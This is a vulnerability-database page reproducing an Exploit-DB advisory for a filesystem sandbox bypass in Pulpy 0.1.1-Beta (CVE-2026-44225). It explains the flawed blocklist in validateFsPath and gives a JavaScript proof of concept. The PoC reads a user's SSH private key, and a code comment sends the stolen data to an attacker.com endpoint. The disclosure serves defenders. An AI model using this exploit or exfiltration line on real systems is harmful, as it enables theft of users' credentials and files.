Lucene search
K

Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass

🗓️ 06 Jul 2026 00:00:00Reported by Onur BILICIType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Pulpy 0.1.1-Beta sandbox bypass enables access to home directory files via weak path checks.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-44225
12 May 202620:02
attackerkb
CNNVD
Pulpy 路径遍历漏洞
12 May 202600:00
cnnvd
CVE
CVE-2026-44225
12 May 202620:02
cve
Cvelist
CVE-2026-44225 Pulpy: Incomplete filesystem sandbox in pulpy.fs bridge allows packaged web apps to read arbitrary user files
12 May 202620:02
cvelist
EUVD
EUVD-2026-29801
12 May 202620:02
euvd
NVD
CVE-2026-44225
12 May 202620:16
nvd
Packet Storm
📄 Pulpy 0.1.1-Beta Sandbox Bypass
7 Jul 202600:00
packetstorm
Positive Technologies
PT-2026-40423
12 May 202600:00
ptsecurity
RedhatCVE
CVE-2026-44225
14 May 202619:58
redhatcve
Vulnrichment
CVE-2026-44225 Pulpy: Incomplete filesystem sandbox in pulpy.fs bridge allows packaged web apps to read arbitrary user files
12 May 202620:02
vulnrichment
Rows per page
# Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass
# Google Dork: N/A
# Date: 2026-06-19
# Exploit Author: Onur BILICI @basekill
# Vendor Homepage: https://github.com/enesgkky/pulpy
# Software Link: https://github.com/enesgkky/pulpy
# Version: <= 0.1.1-Beta
# Tested on: macOS, Linux
# CVE: CVE-2026-44225

Description:
  Pulpy injects a 'pulpy.fs' JavaScript API into every packaged web application, 
  granting it access to the host filesystem. A 'validateFsPath()' function is 
  implemented to sandbox this access using a blocklist. However, this blocklist 
  is incomplete. 
  
  The implementation only catches root-level paths (e.g., matching "/Library/" 
  at index 0), meaning it completely misses user-specific paths such as 
  "/Users/<username>/Library/" or critical configuration directories like 
  "~/.ssh/", "~/.aws/", and "~/Documents/". 
  
  As a result, any malicious web application packaged with Pulpy can bypass the 
  sandbox to read and write arbitrary sensitive files in the user's home directory.

Root Cause Analysis:
  In 'src/bridge/native_modules.mm', the path validation logic relies on a weak 
  prefix check:
  
  std::string normalized = fs::weakly_canonical(p).string();
  if (normalized.find("/etc/") == 0 ||
      normalized.find("/var/") == 0 ||
      normalized.find("/usr/") == 0 ||
      normalized.find("/System/") == 0 ||
      normalized.find("/Library/") == 0) {
      return "";
  }
  return normalized;

Proof of Concept (PoC):
  An attacker can execute the following JavaScript code within a Pulpy-packaged 
  application to exfiltrate sensitive user data:

  ```javascript
  // Bypassing the sandbox to read sensitive files from the user's home directory
  try {
      // Example target: SSH private key
      // Note: You need to replace '<username>' with the target's actual username or dynamically resolve it
      const sshKeyPath = "/Users/<username>/.ssh/id_rsa"; 
      
      pulpy.fs.readFile(sshKeyPath, 'utf8', (err, data) => {
          if (err) {
              console.error("Failed to read file:", err);
              return;
          }
          console.log("Successfully bypassed sandbox! Content:\n", data);
          
          // Exfiltration logic can be placed here (e.g., fetch('[https://attacker.com/log](https://attacker.com/log)', {method: 'POST', body: data}))
      });
  } catch (e) {
      console.error("Exploit failed:", e);
  }

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jul 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.3
EPSS0.00357
SSVC
28